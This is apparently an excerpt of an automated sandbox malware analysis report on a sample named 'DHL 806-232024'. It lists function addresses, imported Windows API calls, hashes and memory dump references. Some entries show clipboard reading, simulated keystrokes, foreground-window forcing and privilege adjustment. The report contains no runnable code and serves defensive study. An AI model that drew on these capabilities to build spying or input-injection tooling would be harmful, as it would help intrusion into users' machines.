Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 5562889b37bb5d786943582350b0b92e021a60243e2d7d11876119b5f1fb0ea0
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: D031D370A00109DFC718DF68D480969F7A6FF59300B648AA5E50ACB752DB31EDC1CF90

Function 009100D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 009100E1

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 7009fa98468662d67484f5be488939b75d9dcd9315a79b40589058339a919f41
Instruction ID: e0075fc5059a4d6eaa9b1fb6484534cbc6a71a32b6a50ab9f7983e88d8af3e77
Opcode Fuzzy Hash: 7009fa98468662d67484f5be488939b75d9dcd9315a79b40589058339a919f41
Instruction Fuzzy Hash: 2D412574608345DFDB24DF18C484B1ABBE0FF85318F19899DE8898B362C772E885CB52

Function 008D7CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008D7D13

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 6ee465b42f070a87ab8bdcbdc4f1a5421f4d8a8dba431b986a5974603d4dfe50
Instruction ID: 36281533c2918d851d05bea37a442cfadc507529b3b213d974baacf409cd1514
Opcode Fuzzy Hash: 6ee465b42f070a87ab8bdcbdc4f1a5421f4d8a8dba431b986a5974603d4dfe50
Instruction Fuzzy Hash: EA21213162860DEFDB244F24EC527797BB8FF50350F25856AE486C56D1EB3082A09745

Function 008D4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 008D4D13: FreeLibrary.KERNEL32(00000000,?), ref: 008D4D4D

Part of subcall function 008F548B: __wfsopen.LIBCMT ref: 008F5496

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4F6F

Part of subcall function 008D4CC8: FreeLibrary.KERNEL32(00000000), ref: 008D4D02

Part of subcall function 008D4DD0: _memmove.LIBCMT ref: 008D4E1A

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: f4ff276917c3e88e8c98e1920e056c3854d3717c64eac1619895e32ca8b6b07e
Instruction ID: a08eff7756b824965d64778023d065f4b246f730dc3c8a31c72c390b6f0f3afe
Opcode Fuzzy Hash: f4ff276917c3e88e8c98e1920e056c3854d3717c64eac1619895e32ca8b6b07e
Instruction Fuzzy Hash: 1C11E732650709ABCB20FF79DC12B6E77A9EF40711F10852AF541E63C1DEB19A059B92

Function 009101AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 009101BB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 7574660e0fa8745734c1dfc96dffbd67f7fe2862795c1163028302355a95db96
Instruction ID: 8e7d18061a56adcc3ca9856fd7c1caba7c0a717b4b91875e59b46bf7adbca41b
Opcode Fuzzy Hash: 7574660e0fa8745734c1dfc96dffbd67f7fe2862795c1163028302355a95db96
Instruction Fuzzy Hash: B82124B4608345DFCB28DF24C444A1ABBE0FF88714F158A69E98A87761D771E885CB53

Function 008F4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 008F4AD6

Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 351cee4260270f6338280a70cb88a8a6ee4f30eefa5038d83a1715a3e0632510
Instruction ID: 973550aaf5bb9fc1e293d5f5e1b0aa4f7156bd555fe9d36936fcfa55bdf689c4
Opcode Fuzzy Hash: 351cee4260270f6338280a70cb88a8a6ee4f30eefa5038d83a1715a3e0632510
Instruction Fuzzy Hash: B1F08131A4021DDBDF51AF788C063BF3665FF00325F144515B624EA1D1DB788961DB52

Function 008D4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4FDE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4b63cdae1eb40ee5132f4d1de347fb9c58d59d9fa6fdf05a03745365832ceedd
Instruction ID: bf51add0f31b8c99e408a61c20a2c2e96e89ba395975355b0b7093fabbf13274
Opcode Fuzzy Hash: 4b63cdae1eb40ee5132f4d1de347fb9c58d59d9fa6fdf05a03745365832ceedd
Instruction Fuzzy Hash: 02F01571509B16CFCB349F64E494822BBE1FF043293209A3EE2D6C2720CB32A844DB41

Function 008F09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008F09F4

Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 663271987e24e81dbfb9cab845d066cdd291f6d39291b5f98a5e5473fb6c4025
Instruction ID: 0318b5649dc554f4329fa6a7d7c441ee7959512091eca3f78adbbc412a3b35da
Opcode Fuzzy Hash: 663271987e24e81dbfb9cab845d066cdd291f6d39291b5f98a5e5473fb6c4025
Instruction Fuzzy Hash: 49E086769442285BC720E6589C05FFA77EDDF887A1F0401B6FC0CD7248E9649C818691

Function 008F548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 008F5496

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: ce350de4b08df158806ebca8a92aaed3a96e93d6cfab4538b195c443e53b488a
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: B9B092B684020C77DE012E96EC02A693F19AB50678F808020FB0C18162A673A6A0968E

Function 00E4F278 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00E4F289

Memory Dump Source

Source File: 00000000.00000002.2065276175.0000000000E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E4C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e4c000_DHL 806-232024.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 01dad5f2848b12612f4e359b8e652c25aadce7879eb41d40a7ac86dd22ce1eac
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: D4E0E67494010DDFDB00DFB4D54969E7BB4EF04701F100161FD01E2690D6709D508A62

Non-executed Functions

Function 0095CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0095CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0095CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0095CF00
SendMessageW.USER32 ref: 0095CF29
_wcsncpy.LIBCMT ref: 0095CFA1
GetKeyState.USER32(00000011), ref: 0095CFC2
GetKeyState.USER32(00000009), ref: 0095CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095CFE5
GetKeyState.USER32(00000010), ref: 0095CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0095D018
SendMessageW.USER32 ref: 0095D03F
SendMessageW.USER32(?,00001030,?,0095B602), ref: 0095D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0095D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0095D16E
SetCapture.USER32(?), ref: 0095D177
ClientToScreen.USER32(?,?), ref: 0095D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0095D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0095D203
ReleaseCapture.USER32 ref: 0095D20E
GetCursorPos.USER32(?), ref: 0095D248
ScreenToClient.USER32(?,?), ref: 0095D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 0095D2B1
SendMessageW.USER32 ref: 0095D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 0095D31C
SendMessageW.USER32 ref: 0095D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0095D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0095D37B
GetCursorPos.USER32(?), ref: 0095D39B
ScreenToClient.USER32(?,?), ref: 0095D3A8
GetParent.USER32(?), ref: 0095D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 0095D431
SendMessageW.USER32 ref: 0095D462
ClientToScreen.USER32(?,?), ref: 0095D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0095D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 0095D51A
SendMessageW.USER32 ref: 0095D53D
ClientToScreen.USER32(?,?), ref: 0095D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0095D5C3

Part of subcall function 008D25DB: GetWindowLongW.USER32(?,000000EB), ref: 008D25EC

GetWindowLongW.USER32(?,000000F0), ref: 0095D65F

Strings

F, xrefs: 0095D543
@GUI_DRAGID, xrefs: 0095D1AA

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: a48ce6f0f95909818f00fc28d6acacfadb0355902a057f95dee3e6792296849b
Instruction ID: 14ad9e8bb95413fdb2e7fe6fdb4d6547eb3d5d5a53180e7b8681b2b64318d71f
Opcode Fuzzy Hash: a48ce6f0f95909818f00fc28d6acacfadb0355902a057f95dee3e6792296849b
Instruction Fuzzy Hash: 7C42AF70109341AFDB25CF2AC894F6ABBF9FF48315F140519FA59872A0D7319C49DB92

Function 0095804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0095873F

Strings

%d/%02d/%02d, xrefs: 00958478

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 8fe0cba292e64ade3054169dc53d76399e4596ef65b89b225e3d0691fbeec789
Instruction ID: 9eceaec5d12b85b48e4c8db9967502e9deac5b9073dbe3377b730c366b02f583
Opcode Fuzzy Hash: 8fe0cba292e64ade3054169dc53d76399e4596ef65b89b225e3d0691fbeec789
Instruction Fuzzy Hash: 8412CF71505208ABEB258F2ACC49FAF7BF8EF49312F204569F915EA2E1DF748945CB10

Function 008E710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008E75C2
_memset.LIBCMT ref: 008E76B1
_memmove.LIBCMT ref: 008E7C4B
_memmove.LIBCMT ref: 008E7E4F

Strings

[:>:]], xrefs: 008E760A
\b(?<=\w), xrefs: 00923C41
Q\E, xrefs: 008E81C1
[:<:]], xrefs: 008E75F1
\b(?=\w), xrefs: 00923C34
DEFINE, xrefs: 009225AF

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: f6554a290bb8575d8b195b770100ee5a0cd1f01c0f7725cecfe0dad9e1f94ba3
Instruction ID: d5a8845000bca7a29d9af94cdfd51b919674355986c0dd01440d0a3f7340e1c5
Opcode Fuzzy Hash: f6554a290bb8575d8b195b770100ee5a0cd1f01c0f7725cecfe0dad9e1f94ba3
Instruction Fuzzy Hash: 6F93C271A0422ADFDB24CF58D881BADB7B5FF48314F24856AE945EB384E7749E81CB40

Function 008D4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 008D4A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0090DA8E
IsIconic.USER32(?), ref: 0090DA97
ShowWindow.USER32(?,00000009), ref: 0090DAA4
SetForegroundWindow.USER32(?), ref: 0090DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0090DAC4
GetCurrentThreadId.KERNEL32 ref: 0090DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0090DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0090DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0090DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0090DAF8
SetForegroundWindow.USER32(?), ref: 0090DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB10
keybd_event.USER32(00000012,00000000), ref: 0090DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB25
keybd_event.USER32(00000012,00000000), ref: 0090DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB33
keybd_event.USER32(00000012,00000000), ref: 0090DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB42
keybd_event.USER32(00000012,00000000), ref: 0090DB47
SetForegroundWindow.USER32(?), ref: 0090DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0090DB71

Strings

Shell_TrayWnd, xrefs: 0090DA89

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 20563ab8fd90f577c7f8c4934b3983dd1b117adb0be92c19828e5821e180e4c2
Instruction ID: 058aacbc49254b55261a0fce2e3f0087a32eeba7b1af0a5239b03d38fb2151a9
Opcode Fuzzy Hash: 20563ab8fd90f577c7f8c4934b3983dd1b117adb0be92c19828e5821e180e4c2
Instruction Fuzzy Hash: 20317071A95318BFEB206FA29C49F7F3E6CEB44B61F114025FA04EB1D0D6B05901BBA0

Function 00928858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00928CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00928D0D
Part of subcall function 00928CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00928D3A
Part of subcall function 00928CC3: GetLastError.KERNEL32 ref: 00928D47

_memset.LIBCMT ref: 0092889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009288ED
CloseHandle.KERNEL32(?), ref: 009288FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00928915
GetProcessWindowStation.USER32 ref: 0092892E
SetProcessWindowStation.USER32(00000000), ref: 00928938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00928952

Part of subcall function 00928713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00928851), ref: 00928728
Part of subcall function 00928713: CloseHandle.KERNEL32(?,?,00928851), ref: 0092873A

Strings

, xrefs: 009288AA
winsta0, xrefs: 00928910
default, xrefs: 0092894D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 194cadc185b220dcc63ee00724d889fc6d900e42fd9c54dd5a01a8215cbdb66f
Instruction ID: 30198a170f9f04b1e56faf590e2e80e4fd6626464fd7947de5b2560af74187cf
Opcode Fuzzy Hash: 194cadc185b220dcc63ee00724d889fc6d900e42fd9c54dd5a01a8215cbdb66f
Instruction Fuzzy Hash: 3B814871902219AFDF11DFA4EC45AAFBBBCEF04315F08416AF910A6265DF318A159B60

Function 0094425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0095F910), ref: 00944284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00944292
GetClipboardData.USER32(0000000D), ref: 0094429A
CloseClipboard.USER32 ref: 009442A6
GlobalLock.KERNEL32(00000000), ref: 009442C2
CloseClipboard.USER32 ref: 009442CC
GlobalUnlock.KERNEL32(00000000), ref: 009442E1
IsClipboardFormatAvailable.USER32(00000001), ref: 009442EE
GetClipboardData.USER32(00000001), ref: 009442F6
GlobalLock.KERNEL32(00000000), ref: 00944303
GlobalUnlock.KERNEL32(00000000), ref: 00944337
CloseClipboard.USER32 ref: 00944447

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 0b900476f15071fb6b962bbd9423a58f8d8433ace4ef98eb98b77c92d5cb4ac1
Instruction ID: 829164c59e7cfe094d2954b983b4e0a0d346dde53b4c0441dd33680d737f2e96
Opcode Fuzzy Hash: 0b900476f15071fb6b962bbd9423a58f8d8433ace4ef98eb98b77c92d5cb4ac1
Instruction Fuzzy Hash: 6751A171208306ABD310EF65ECA5F7F77A8BF84B11F00462AF556D22A1DF70D9049B62

Function 0093C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0093C9F8
FindClose.KERNEL32(00000000), ref: 0093CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0093CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0093CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CAAF
__swprintf.LIBCMT ref: 0093CAFB
__swprintf.LIBCMT ref: 0093CB3E

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

__swprintf.LIBCMT ref: 0093CB92

Part of subcall function 008F38D8: __woutput_l.LIBCMT ref: 008F3931

__swprintf.LIBCMT ref: 0093CBE0

Part of subcall function 008F38D8: __flsbuf.LIBCMT ref: 008F3953
Part of subcall function 008F38D8: __flsbuf.LIBCMT ref: 008F396B

__swprintf.LIBCMT ref: 0093CC2F
__swprintf.LIBCMT ref: 0093CC7E
__swprintf.LIBCMT ref: 0093CCCD

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0093CAF5
%4d, xrefs: 0093CB38
%02d, xrefs: 0093CB86, 0093CB90, 0093CBDE, 0093CC2D, 0093CC7C, 0093CCCB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

